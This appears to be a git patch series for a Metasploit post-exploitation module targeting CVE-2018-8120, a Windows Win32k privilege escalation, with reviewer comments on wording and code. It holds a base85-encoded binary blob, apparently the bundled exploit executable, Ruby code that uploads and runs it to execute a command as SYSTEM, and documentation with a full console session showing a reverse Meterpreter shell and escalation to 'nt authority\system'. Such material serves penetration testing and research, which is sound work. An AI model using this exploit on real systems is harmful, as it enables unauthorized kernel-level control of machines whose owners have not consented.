zRmG?=!qP)-byf*OzCBb<>rmG9goccVtba;@Tn zy`nY|5SkAaiZr^4M7v$+F4YRl{n{*Vg*Ly~M|P#f=xSjvREi1iY6-w?wbaS@ z;m<290O3FA9^v@CjAj>CYqQ)-wESYPrhB|lS8B5n|7?Gyru&zIHa*(h5}!7wX1V5Y z%Pt0f(8gDiKd;areE2UZhl(&Nh!=w}1RWt9F)$!3f30YhMDHHZa;RM({2D@tBixwc z3t}CIA`0-MFF*gP($cF|DmH~yitkE$K0Z5XR^k)xT&@{aRWm}Ip!s5)g@4dNHCz+| zQz94QKT#~roc&N|p|`DoIv?~zNtXU-Z7jo;{zF)XQ;RU93mG2u*C8_m!{K`enX34d zZxt`i$wOx3e>TFWbk9P_OQ6!siTYDr%mXB*6wc;+l1g=XYfA*}5bM znJ&2=B8~^;i9VUm8st@)$@I$kddQVZ|3Gscsid!fRnq6+i2$SC0vf`TqL*@2gLWioy(M z!-fq}nwF7KUr^tuS+vxzXBI51$NUA8oPvTz__U|iH`c?KhG|ZDdAY?BQ|Ixl@OaLf z-(cz_zAY1Ff2jDITN%^5fxc~w)!b(XV{dsliyy zCVLsHxmO?K1P)J|B-1;Dv4!za#x}-Q#>tFrjO~mS|238IFt*QNJe+YR<0Qt}jA;j( zJ{My;R7PI`W5uss#5hG-YekF|zqXvQ;@5f@D}HSqW6VFrSI=1SZyOma{_Q5lc6Ps+ z@p#5t7%TqmR>l+9ejDS7jCU}e#JGj=*BG}m{yO6h#%i|S$@mJk?_!+B*kF7m<6g$; zjQbd0#aR2Atp95nTNq!**v2@MaWdoSjO~o&Y6i;$#yD~yz6{3Mj58VQjI$Z%Fm^F^ zFfL#`i}51HH!&_^oXfbJ@odH(#y2yrW31*M^^E7TeIw%n#+w-5%6KzlHDB1m_;$A6 z%Gk|#8{@T%cQ7__2hhSef^i39GvhACk&M;6DvEJ0+eb6jzAo!ChOv#Yg|VG+EaPo4 z(tSMR47N{ToXvO$;{wJ*85c3OGWIaGF|KEv$XLx6hcQ<3MH0h7-zIjS#CQwi5sbGn zzJzfL<7CDij8hnQF&@ddm+>gZTB^+dXvQ|iV;I{Rk7b;}cpT$w#&*U9jK?!BVtg56 z590}p>lsgEyovE7##iR#rPV=ix^+axSa8IjO!R@GHzr%o$+SIGZ=4WoW*zt<8Lr-XM7{$PR7}c z4aPd-KE^qWEmz3=I~dy;I~iv%p2awu@lA{i80RuBVmzC%hw;sf>lx=U-o$tg<1LKm zGTz3xfN=}sd5k+4-^#d)@j}MEjBjVGrOEud8QT~yV{B(!$vA`YI>ywO< ztpgR~r-wIdn{fi;0>&d57ctIa>|t!;30^(pNXDBO 
z$1vW)IF|7?#&L{W7$-39U_6p>7vn6(eT+>!VYEz^`Hy9s%s7s5D&qvknT$s=b}`Ok zT*TPK6G{)`SjP2?;}~yZJd*Ji##xMaFgDp~^wYF<#<6w*wNA!yj1A?Vai8)(QM$KW z#rb8N%s7s5D&s81nT$=T(!WdjXS_)HXI!q_Un$+!Dff&Um3zjUmHQ0oeyeiNc!zS& zxLvuQCf#=`_lynYo^hXYpDEp2GGzYa7$-BPOH1^nDtpG6%063IYc6Hac#*;mXyds_G;a(*7Y{F zXEM<2jB##Md>M?lGgj+-#RqV)y_4UgY82cjP+sat2n|3gMhV9!K|0`p)j#2BjPPPxQz2ZZ}FgDm;t-};w!ov1_ zZ2uHv%T!tZuQN_&{0qjZjQ26lWc)B=7vr6b7cqX7aXI5>8P_p>i*Y044#t}q-^_R` z;}*s{7$0G*_$;xE+u8mQ<4(r!F*X<^#+{6hF*X?QVXXKd z6Bzfgy;?^rzJ=m@Sgw)fQ>nsdzJ}tXB(r_F3U3f!ES2r^*gl#2+sTYG*}j&s#^J{^ zcCr0;7%yV{6UOC?f5o_taX#Zl#?LX{%=krxIX#N6vX$){*}jPF6`y7Y+bceUh0~kB z?%Ua3@jdM9U-5xD+1|(Q%h^9qdo+XXpJw|$#)|J@WA{VY-g2$1pSg?`Un-SxGTYzH zcnkX<$2gVki}+pkdl%b(m+>OTw=hm+_cq4mY(I~&jmsyUaUI)x z8E3Hl)r=e2zD~Jk`x%Tkv;BR_KgXZQcniC~k?~e`-^6$aZx!QY#tn=&vHKesr?UP1jO*Dxi*Y8~ zuUGEbK7+A~?H^~ni17-><&6D|>liO!oXPne#<-E~zsGnp<3h$;8GoN~Hv1pWcn8}z zGhW2$y_Ru1+pl5lV*g2uJK6qL#szFYg0aE&3mNw@-ptsNDa-#s#>tGIV4TW$E8|5R z{w0hv*?tk@BDTMjv5W0*W32e1*E3$k_8SyVDf5wk7_HcYDj5o9W9gKId z{bh`|vVEztXZ$kbcE-CHcQW3_*kHVaaUbIYj4jh;dG2Lg$MKJ3oXqxjGFJ2U4;iPj zeH-I!#xF5m#Q3L-J&Ye^T+i{1V%*5~|IBzZ#;I(-gz;v!AImtC?TZ+@IQ(e}v;7Yl7cstsq+>t>@?F? 
z!h58&i%lP$#H5eTF-cX{810kOS0;AdNtGiXoqMHE?#gT8L>gf_dr2Ri_n?o?b1;WD<-7-7jFO|z&FQM*aEnnA^etn5bW)Z+I=@OE-GiZT z8M|M`;nm{IAANofm(Ci~N4Fv9qx%o^(P?w3%JkEDLHeqK8AXu^by^q11a}Je}q;1M2D0f<(}w~%1`CLR{JKf9t^)0 zrA_v#Jcv%yky;n0hv=2C3XkZP(x<{B`lb9i*gerPonHvm7nRpcO^wGy*A$;BU$@Ag zGZ;V7c{);eD~Ct)PFR&6(LKed(nIv04%c(oJ+%YMUp`}M4}@>W|2+8hG5t~d2&Wrr zC+YB|@`xT-% zS#q*}p%5j7eG~bil9|ahL#M*S>#<7I)0|*A%l;@=Q|mDrhp4|%?M0s738jz5BZ^JU zS7|(=*i^m9{vqUF_75TZYLWl&{(*)IgxkzWVtwl^e4w}SFk+*MznvMD&MM3$ zLM>Ou?+DV5j6Xlv52*M<{UOC4qBj{o-Pe(yj6am#C4#;v{=xMx)1hisrh{%M$WNAk zZjcUTJOx2}8BadfE{)HUZZ8xM^#F=OWjuvJ`jPR3`bilN-IkDFc(?=Wm2UBbMkX09 z-LVKy|LibK?d;ZIerm;xCNz>u|F;G0Wx8^L{fH{(P`YH#qbN)ISG@?$uc)482J2Oo zpK90A{p?^qrTfAl9ZC0kuwJG6ys-38__qho6HE81wW;=YbC^B3F9_?0s629lPFeLE-N2=Gm~aU&gaug)1>j3wIwn zfhyBOv>I+tx5L8mHwW3%C>L%|qf|InvlJEo%CP*>XeE2|lCXYUn#li^uva0_dLkXE zSK-U~vs!J@e46Nn?nKE?_9sgaLOMp)P&jg)O|>dNT946PFSTx`w4|eyRXNFdcPVBm z@{|3XJOfQ85{J(HN=*O5-P5hKfmp6K)H)#@(@=hFQ>K{}M}iKtDv zr}C$p-r<;T*$u>l?FafV9pqo0-KG#^e4+Z5cq!;AJpA$?-AMZ?+&&Jsr@M{eSgjgW z_;lxcp#8w~d4hB+!>3tIxO@K~d%9hz>}j4vH{KPdd21*?avec;>*XiceTr*9d;^-V zt5ve(BT#v(@Z|Uyq927-KO`~zSK-t6SsA29X5wAr*jo7YVd@9zzx?F7B-~!Mw~#&Isv!Nz^&9<{pIp}~?vdmth0~9m z=PND~*;D-C?kW6Ge<0Ukq4Y>Tf#OOLKZfX??oY~3V)`#XH7`~@hQg}FE38_ifcpT`p%zvVhm{tqvoaP#o|O1{i;q(Xj@e-cWMobOS8B72w+mK3Y7@-K0DFg+5} z{dM_CTpR2kB=!ZzPsy(d#h-(jIjvb1U`9TX!}y1Si$mxArQ-g+{5#+7d=nRLV*jpYm`22ML^4|Mp=0r(VGBe}n=|>wT>Xj}W@k2Sp!=_u+mI`p7Scet=Z zuzth+4>UGy3_RHUt%o*!`{75v^WE=#fAgdN{Da3H|KSr`e)Qy1KmN&2f422se*Uk& z_~oyj-uCO?JoD^tpWD9U`JFGk_|nU-w6wPE+WqRDz3uzXjRoc;38e>sOYI3moE zQPDA$*tqzFAw#XU#9_meMqF}fa>~e2qsNRLXCHsrgo%^B_Vv`uuSmNxeezWqS5KKb z?V4+^%bY$V>-rnMabtGzl9Ez)+0ycgyO&i~Ro8gF>8dCwhpF8-&xiY{({ z@2b^n*8Xqj|9?CF|8n{3GjklySvR?IXWyKcKWA>iE%W9V;+=s-x7{ww|Kj$47v=w7 zCBKVj?<pcj;v1&*}BncxTv! 
z91$Ufz+P5dQR(;6+?K)>_V!7oalqBSW!~z_D$ithotXMo`)X>*L}B3`GAkVJl{LksFt%T57rOAs?G@FKl2KebnNlg!J;-0UYt2;*X&bekVqZylVeyhm zHI3JDZgr+l$+$W*J@e`*8FqJ_r?RHPXJ4|?p6#!Ocnoi9xzFdRopIGwODlZk{w0%3 zYO1c1HkXTd7m&1w8RU^l#188!NV$k}))iNID#I);t9JYBen^P07nfF5RP+CtQiozr*5i);s!fVq`1r0l{r#U{ZPWP=9UZ20XGT&WQ1Gx=U zKeJG~c3+L%>#nV-T<*4C#BFLu-K0gA%iLH$5Z+!Tq)y33dUf0 z77InyhlND$AnW5ovM&ZWC3--H?I=A&fl~6>CskI~UAdyh3+hl1^Z|E;-ioDg13@VE z<^IZQx3_pnMP-F=<>bkeh5cL<%?groQ@s>M6il2p$9Ie0?OmA*VKv_6qOp}hJc-Q5 z`Q>vVw_%y0{39LCO80WKA0z{UFqR{@rEW@s_{ct|(p_9l)_zaO9I}-bW1d!swcSd= z-yrE@Qc5Ao2Bh`AADCoEO~TsCjujvMr=5-Y@a4pgij?gnD{7$#V?KNoLuTEb*ynd+ z6-#_o$$Pm2t4NA32l0_aMG9HUm?9Z+B-vmgY{`d`2R2^212KExi(;UBaOK%cyd)#2 z)V=~u!S1O*%PbwwvMouUl8abhGNaTcR36T>_agmpFY1-}vy!mI>w3M_cZKSCsIjY0#i71ffU9W1| z_;JzNxIey}eCbE8BwKdxNp2aYX?eqOjy>0;jkiQ-mT9|_3GW^OnGDLT^wng-Z{hbE znIRJcakQo(ObuabgTgeyEt00iO^epzrbK%ZaUt4@d|0Q%dkU|I9qcP{xOq8#?-&61 z5>w)|6kmdtQW~$NOoM*jh~D8{i5=uV0`>;nUTKHOijT>)ru`P!X~)yIj1yDLTFT53 zo+J!pDvrIdHzVP<{1rC=*zXN@Gs2>c@Znb)qm4lNM@&iVQsF&=elKG}D7;va$5<_H zUUV>Db}al~#IFuK%oXXpPpapcm^ji)Nh{ zD&sP=>rVW3s{GrcHJdL+vmsx$DG9-R%|Mwg#_x!7ml&-jq7D+L4C#vZ#1*Oh$4`aK z6a0FWJ1VPb@l-~=)~+Ef;cidD-K1&A3)gSTwei5U=1Hbw7^PTe?#lJMDRGtm!$;#$jxULKvd$#G&n= z{h&OO=Gi=^LHRbtMrg59qB2r4;#P)rW56FO15ap zrT7)bXvrws4@IyM1kq(%NS~Fd0(Jn<@U0MhgZQ{}?!#yT@f@UurqS*`M zH9N}PK4o<8$gbp$OIngVMC;UE678_xJx;Ux#=`9wxErn6aj`R{_tLHr9g^me6m7?y zcy$fGv0Uzdg#LlMLO2n^1%@Nu;Zv-F=E#o^<@zK1rn8@Cp#KEFd8%!OwPn>FFD*sC zf}iqpE%b}=Q+`Z>CgVYqae^jIV-mD6zIbg6%47`6WDLq=%oLIO783+244D?I4Ve;M zV2X~=qNhY;$o>OT3cb-D69hI`ypbMrQACDpbFyDibom}OUTt7fdyrmIIgA3?r=TxE zd8Z)0lqsT5X;J>3gWFZLkh8$~jODhf>|?<;9D*N}KdFhA#-Z-4sJEforSpdOCU#jn zi0YO5Ux1N46`M&v9#C#Eq7PJVBCxr68-8ud4fT5;q0jS$r4xOha{mGj;d)nv+^0;6 z(=I7Y)GnE3(=PE2>$Pjp21kKO^Yv(?aPCMY8mGQI@%+9rnC|!Q*R*r^ zeZlz@b>fZ45PmMwXME74X_syc^%*8HCRkB_L$#E`A*e%)4-b#%5`6*2FjGu~7GwH> zs2{2$`q3xa3)7J*$6XI=+A;hRy4g(!MTL0l<_3v}2e{UxF-ZJPCP zyeB1nh;y8882b7|(3edco-_2}xL!+FbVp>18q2Akq(3YC4b`l_5&o_j=d;0|q|4z` 
zhk6J5qx2_Uq)-3&Cz=-j(@>u-%Jx3QBgzNmQW%BuiPVyYp&yNlAX?5a4UN!-PKnDf z4WsgkLwP}+BFigLmV2;G+_p{AYVZq|JN3oLqwP1KLJ#%+vc6IvbY#f1ByGsaXb;gO z?fIraP)Ynr+3tg8=?U66-w177X%hPGVcNLg1jo<en|@ zoRrRa=x0Q~l!$)GhJMM4erc#S=3&{Zri_Z#5=@C&cw6z1UolP%!#I_Qcrac)983e( zH)ypKw2J;*%w@bIx>Ay(wAc?+NU}{9QCi1DYeP@QbSWFkgNQ?nA7Nw4u%s@UCzyss zYr{Sot_|}gYQql47l``04B=pom#EU35h2P#gcB8^MNKntnT$u7Bww&hwjnK^Le+va z?H71!!QKlwpZvxKthG;J<~a#DRAKH?>8%F1+ZN`|1+yZ!+Y)A04zmK7UFiGAdm^&j z|M8xPEQkNC_e2(&!k_0jXu{e)NAgA>3)Q_)dxs^YD#iewPK_Wp17xadRb-Z5Q|hmD zOW~oowl+U<9@su4JXF(OC3~MN{iM{azVpzCHV-a2O*dEO>;iv=~m2K=|g!etSEKoloxxoccPTG zuqJ4)?WGXr`%1ZbwG&Z7`mZ3Ticsi;=Yao*l8rVw+?C)|4lbC@CLu$ZTn1$ae;~`G z8hkc)P5~D6VHn8>BZ6ZlT1X=-=%SEkkF<(@+wO(C1-&0X7NmO#3Qi7muH^qj1SDsaE_b z4(b}nED^t9{3G-6_>uWF_z}hwLEs$57>Iuil{K!5Tg+k?{$_!fZnUv-tc#!pZedS>P|55kv8`bhH&xoW-_rC zKQQ!nn3@01BwdtDcy@YGGO_=6rs97utpB$N!xSMUEB_c1l%o4q-Z!2L_NVVl&5wQ} z)pbvF{h4&xYwCr%74BP~diyE6v_9|ux^vPfo7LZbMfWsKKap;Bej2f(s=TY zi-*7FN5aP~m{8sF_CLLC*Y0}z?zg9$@BT>V@4L?6yxkg^vVyw@uD57h%nA1uDeWU! 
zwXmANs*TkoR+CvB&FVx}Gg!@J)x~Ndt3|9g$7&s`t5~gPbv>(%tUk!Sk8Au)3AiXIXubRTchj#;>vZCaYbn_OjZ?swGO6QxdDmtlC-4VAaLy|7q`hz?>-W zJU-h)$@OTBo;`zbnhLn71vkig2H7P8t`aI}Eci5{)a>C(I2H&5FybOX5Mu!evS`{O z%%A+3%uHsYS2d+uh`4y+c~*#mlB>W)K}nC(Cq3;M7399Zommb&+g_ii&vVan*Lj{F zpYObR=bd-H@4T~_$@?+`-#>ijy5D5LWYA>TWW;3DWXvRIGH0@2vTU+u5|8az+NaH= z-K4{$)1=EJYtm!VYtm=ZZ!%yqXfkXvYLYXVGdWOx!CWtyteC8svsat2Q60pADK|EFBL;EUyadAt9u&*^x6-!WAde|5c`Ek=5QHONjj z82baq`Q_stSpOVf=t$GO2`#iv3)O8PjnczQjQyN`>`%j0=F(-B%S4TG|5(y6MT!Bx z2K>2hqETM6$z}L~H$*@3eqpJtVsJy-aQf_7y1%6RG8S@%a@z5I#Whn`x)E`I9p)|0+Q-R7`fCf7CV@x8sDww+2J`tajZZ+~ya)&nBVE=yCCuZ**KXWZCL<%a-r+O!rMbk=`oQ+;BttYiHKaT3;SD`|(fSnk#Ruf7rNND9%0_SvYOqPoK8`=xg8i_m0Ad89ayR zd$rG4K65W_{rX`sNdMH`v+kSlFSl=edf_E&e(Qeu;OLH_@Axiz@wMN$OBan;J7w4u zb#M9uH=BB4UZ;M+FK<|P$~~^NXYz`7-{{``=1KRSGiUaZQAWqPvgH-Pt|<=Ij;E9_V(D9P!FKJv%3iZC}5_-G1j?FFpM1 zjIK+5aj*OE2TdC<-1X$6-}CZydLH`0FFyy6%Iiv039&kL@b_;8)2`9e#`p^@7jiA1U6h@XbhWU3Z^EGztSkj1FlCnQO*W%i5+9~GC_`?wla|GHCRz~8Qf&CJPj578`yaGY>v4iu>^iHt#YKCb>It%&{l!vGx=vZ=K z$xOF5!fOQOA%+liTwUNVO8?8KwpM3V;fN_Im`p6&Kx3=xN|bh!`}{)nsf-+>M|z3*bs8yh5G`_%?#t>ooY# zSd@u&>;nJ8)OGMddz@Kzaq|zac+y7lQH^z>9rG{!2j#LHUW}X2EmlW^m8l_}vh? 
z0!HsaJ3$klzZdm~&Vw}s)t@-nZ)gj6sNL|NICu`m9wWa69F3ql5H&>qIR-Ad4`m_G zQt(3r<@pG-br@w5|LT6^NBR)(;9PhPeF(f@p5d((^dhJ}#M88nJjCXIF!n|4G&Rvb zAJ1ZEz$@?##C^zL2B&u7c%gg1lL#ua3N|k=>PEbFv7uS;UQ_$Qh^b59-!8#9fO5Rx z76ctvH@H0n-=R71MFf?f2Y-VgPd)s^@LsueuAKSo(AVe480cg zt~NCB|`uj3?&7(Lckbg9I7D0WGS;sIxK~SD;VDn?> zQ>ZiX7=q6K3OF-rlpg_KM$j?#f`9qAp@)F;5&iyvcl-$FF!Iats9Ysh(fcV4-td*gYAfJ=peWl5r>X}J2zom8MG&cI&U^SU;89H zL?n=Y8vNlF;~4$mjIC%>q|XG8J%#HRbcKkZYXWh~(}stBaPKyFf@@R}ob(K?>Cis# z=Ll+}9`LsaI`%=^am_@Kz6X4dH1b!$%Xb**!$Acx9O;8N^f>|kLKD}CcsD3?6#P8F zFdLwmB+d&8XrepCFh7H4!A}v?cBjE{X`?>P;7kP7fw&2A1o>lNbB19~Kocj*3xWLo5JCoA<`Ta z(nOjYLYhePJV+C1o(5^+K~ocHz6GTd2UiVEq%r=KPNZ@8q=_^JpEPm4scCFHjdQ1T zB8^ceO{B5tq=_`vn>3NeZj&a`_+8S(QKrVx{(1R-??6NUZ^Sm^Hu^j_=zrP3_v)`m zr}u4o@R>i?z^tT9Us_t+;RT%ob46Pl$6o7fw0F=LJIqULZM<{lEn{4b_Rvy{ylU@U zw6LSK@xhKzqkG~vzTVOv3gM01oe$bkz`{^#Bi?&|V`xsGV?ldp%z}AymMjV_x_{{y zOnAMqJ+$E35^rk{@0?LrCs$0N*i}o|903i)G=on z=5ju0t|Mhh$6~w$9TO3~1G6qe=RQ3DsXH2#h9$w(b?MA9-6vv`6A3I zZL}|&H)+lsj6G~^yuZCO)X`{fI#*6h)9>C(OVbzX)Y5eB;IMg1(|~VS`BGbaDmT_cU8BfNS z31q^VXeOSKGWkp~Q_fT~^^8Tf$qv~idt{#+ki&9Rj?0pqmy2>)uF7@UqSzFN;!-?{ zPYEbtC91>~Ny#fkrL0tyx?)jnszY_D9@VD?)UX;=u6;h>CB~?o?X=~b^cBa|1H|cQmeH)5 zU2|%z=GFXKP>X0Wjni^kK`Ut$t)?-$Rk!O-oz=a%Uk~aLJ*IPdPA}*sy`tB2OzdOu z^%EV;%Go(5$8uiI&jq;%7vnfC#}&8|SK(?L!&`Yf@8ntD%lr8tAK_y>$LIJ0U*ao# zjb{X_U>BSMD|iLJ5ELRpOyJOC3qlF~wI(p46}`?WvZ7b?i$O6W#zaoci3PDFR>Ydf zB&-R0!kJ(b-h@99Ohgi~1dRk3f~ploM~3m^-qx&VBppS|)zNkqw4M#^=Rga(q#(SB z!yO6!(cgl&*XXam1y0-G zwF7Ru;I{{k$I;`;=xsK*8-TlE_*+5$s-cH5f(72%;4bwu7Cp_2zUD`7BbTG_Igao5 I|5um)1iaR?OaK4? literal 0 HcmV?d00001 From 882d182fdbdd08c975daedeef4eee76ada03d093 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Tue, 18 Sep 2018 15:13:12 +0530 Subject: [PATCH 03/39] WIP: Updating Thank you bcoles --- .../escalate/ms18_8120_win32k_privsec.rb | 28 +++++++++++-------- 1 file changed, 16 insertions(+), 12 deletions(-) 
diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb index 0ae4d589ad..604575212b 100644 --- a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb +++ b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb @@ -1,8 +1,9 @@ -# This module requires Metasploit: https://metasploit.com/download +## This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Post + Rank = GoodRanking include Msf::Post::File include Msf::Post::Windows::Registry @@ -11,14 +12,17 @@ class MetasploitModule < Msf::Post super(update_info(info, 'Name' => 'Win32k Elevation of Privilege Vulnerability', 'Description' => %q{ - This module exploits elevation of privilege vulnerability exists in Windows when the Win32k - component fails to properly handle objects in memory. An attacker who successfully exploited - this vulnerability could run arbitrary code in kernel mode. An attacker could then install - programs; view, change, or delete data; or create new accounts with full user rights.}, + This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 + when the Win32k component fails to properly handle objects in memory. An attacker who + successfully exploited this vulnerability could run arbitrary code in kernel mode. An + attacker could then install programs; view, change, or delete data; or create new + accounts with full user rights.}, 'References' => [ ['CVE', '2018-8120'], ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'], + ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'], + ['URL', 'https://github.com/bigric3/cve-2018-8120'], ['URL', 'https://github.com/unamer/CVE-2018-8120'] ], 'Author' => 
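Review bot: The reworded 'Description' in the second hunk still opens with an ungrammatical sentence, "This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2", and this is the text shown to anyone reading the module info. A wording such as `This module exploits an elevation of privilege vulnerability in Windows 7 and 2008 R2, where the Win32k component fails to properly handle objects in memory.` keeps the stated facts and reads correctly. The remaining sentences are copied from the vendor advisory and describe the vulnerability rather than the module's behaviour; one sentence on what the module actually does (uploads a bundled executable and runs POCCMD through it) would help a reader more.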
@@ -28,15 +32,14 @@ class MetasploitModule < Msf::Post 'Dhiraj Mishra ' # Metasploit module ], 'DisclosureDate' => 'Aug 05 2018', - 'Arch' => [ARCH_X64], + 'Arch' => [ARCH_X64, ARCH_X86], 'SessionTypes' => ['meterpreter'], 'License' => MSF_LICENSE )) register_options( [ - OptString.new('POCCMD', [true, 'The command to run from CVE-2018-8120.exe']), - OptString.new('READFILE', [ false, 'Read a remote file: ', 'C:\\Windows\\boot.ini' ]) + OptString.new('POCCMD', [true, 'The command to run from poc.sct']), ]) end @@ -71,16 +74,17 @@ class MetasploitModule < Msf::Post raw = create_payload_from_file rexe script_on_target = write_exe_to_target(raw, rexename) - print_status('Starting module...') - print_line('') + print_status('Starting module..') + print_line command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename print_status("Location of CVE-2018-8120.exe is: #{command}") - + command += " " + command += "#{poccmd}" print_status("Executing command : #{command}") command_output = cmd_exec(command) print_line(command_output) - print_line('') + print_line end end From 07b79936b97e044e9dae879d5143a7d985c81d66 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Tue, 18 Sep 2018 15:28:00 +0530 Subject: [PATCH 04/39] Fixing spaces at EOL --- modules/post/windows/escalate/ms18_8120_win32k_privsec.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb index 604575212b..60b20ecc50 100644 --- a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb +++ b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb 
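Review bot: The new POCCMD help text, 'The command to run from poc.sct', names a file this module never touches; the run method later in the file executes a copy of CVE-2018-8120.exe, so the string looks carried over from another module. `OptString.new('POCCMD', [true, 'The command to run from CVE-2018-8120.exe'])` matches the code, and the trailing comma after the only array element can be dropped. The same hunk widens 'Arch' to `[ARCH_X64, ARCH_X86]` although run reads a single executable from the data directory; whether that binary is valid for both architectures is not visible here and should be confirmed before it is advertised.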
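Review bot: `script_on_target` already holds the remote path returned by write_exe_to_target, yet the last hunk ignores it and rebuilds the same path with a second `session.fs.file.expand_path("%TEMP%")` call, so the written path and the executed path can drift apart if either side is edited. Reusing the value, `command = "#{script_on_target} #{poccmd}"`, removes the duplicate lookup and the redundant interpolation in `command += "#{poccmd}"`. The run method begins above this hunk. The unused assignment is still present in the later patches on this page that re-indent and move the method.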
@@ -13,9 +13,9 @@ class MetasploitModule < Msf::Post 'Name' => 'Win32k Elevation of Privilege Vulnerability', 'Description' => %q{ This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 - when the Win32k component fails to properly handle objects in memory. An attacker who - successfully exploited this vulnerability could run arbitrary code in kernel mode. An - attacker could then install programs; view, change, or delete data; or create new + when the Win32k component fails to properly handle objects in memory. An attacker who + successfully exploited this vulnerability could run arbitrary code in kernel mode. An + attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.}, 'References' => [ From 03d50f27739c29aae72926e70fd5e0c4293f206e Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Tue, 18 Sep 2018 15:41:03 +0530 Subject: [PATCH 05/39] Adding documentation --- .../escalate/ms18_8120_win32k_privsec.md | 66 +++++++++++++++++++ 1 file changed, 66 insertions(+) create mode 100644 documentation/modules/post/windows/escalate/ms18_8120_win32k_privsec.md diff --git a/documentation/modules/post/windows/escalate/ms18_8120_win32k_privsec.md b/documentation/modules/post/windows/escalate/ms18_8120_win32k_privsec.md new file mode 100644 index 0000000000..09afbd29a0 --- /dev/null +++ b/documentation/modules/post/windows/escalate/ms18_8120_win32k_privsec.md 
@@ -0,0 +1,66 @@ +## Overview + +An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. + +To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system. + +The update addresses this vulnerability by correcting how Win32k handles objects in memory. + +* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120 +* http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html +* https://github.com/bigric3/cve-2018-8120 +* https://github.com/unamer/CVE-2018-8120 + +## Verification steps + +1. Start `msfconsole` +2. Get a session +3. `use post/windows/escalate/ms18_8120_win32k_privsec` +4. `set SESSION [SESSION]` +5. `set POCCMD whoami` +6. `run` + +## Usage + +``` +msf exploit(windows/http/badblue_passthru) > run + +[*] Started reverse TCP handler on 192.168.1.102:4444 +[*] Trying target BadBlue EE 2.7 Universal... +[*] Sending stage (179779 bytes) to 192.168.1.105 +[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.105:49214) at 2018-09-18 14:52:55 +0530 + +meterpreter > getuid +Server username: zero-PC\low +meterpreter > background +[*] Backgrounding session 1... +msf exploit(windows/http/badblue_passthru) > use post/windows/escalate/ms18_8120_win32k_privsec +msf post(windows/escalate/ms18_8120_win32k_privsec) > set SESSION 1 +SESSION => 1 +msf post(windows/escalate/ms18_8120_win32k_privsec) > set POCCMD whoami +POCCMD => whoami +msf post(windows/escalate/ms18_8120_win32k_privsec) > run + +[!] SESSION may not be compatible with this module. 
+[*] exe name is: f4MZlRO4LZ.exe +[*] Reading Payload from file /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.11/data/exploits/CVE-2018-0824/CVE-2018-8120.exe +[!] writing to %TEMP% +[+] Persistent Script written to C:\Users\LOW~1.ZER\AppData\Local\Temp\f4MZlRO4LZ.exe +[*] Starting module.. + +[*] Location of CVE-2018-8120.exe is: C:\Users\LOW~1.ZER\AppData\Local\Temp\f4MZlRO4LZ.exe +[*] Executing command : C:\Users\LOW~1.ZER\AppData\Local\Temp\f4MZlRO4LZ.exe whoami +CVE-2018-8120 exploit by @unamer(https://github.com/unamer) +[+] Detected kernel ntoskrnl.exe +[+] Get manager at fffff900c1a4e720,worker at fffff900c1a52060 +[+] Triggering vulnerability... +[+] Overwriting...fffff80002a35c38 +[+] Elevating privilege... +[+] Cleaning up... +[+] Trying to execute whoami as SYSTEM... +[+] Process created with pid 3516! +nt authority\system + +[*] Post module execution completed +msf post(windows/escalate/ms18_8120_win32k_privsec) > +``` From 1b220514bb0b58f864fed946ea9b138f16bc52d8 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Tue, 18 Sep 2018 19:23:39 +0530 Subject: [PATCH 06/39] Updating --- .../post/windows/escalate/ms18_8120_win32k_privsec.rb | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb index 60b20ecc50..36c8d954cf 100644 --- a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb +++ b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb 
@@ -1,16 +1,17 @@ -## This module requires Metasploit: https://metasploit.com/download +## +# This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Post - Rank = GoodRanking + Rank = GoodRanking include Msf::Post::File include Msf::Post::Windows::Registry def initialize(info = {}) super(update_info(info, - 'Name' => 'Win32k Elevation of Privilege Vulnerability', + 'Name' => 'Wink32.sys fails to handle objects in memory (Win32k Elevation of Privilege Vulnerability)', 'Description' => %q{ This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 when the Win32k component fails to properly handle objects in memory. An attacker who @@ -19,6 +20,7 @@ class MetasploitModule < Msf::Post accounts with full user rights.}, 'References' => [ + ['BID', '104034'], ['CVE', '2018-8120'], ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'], ['URL', 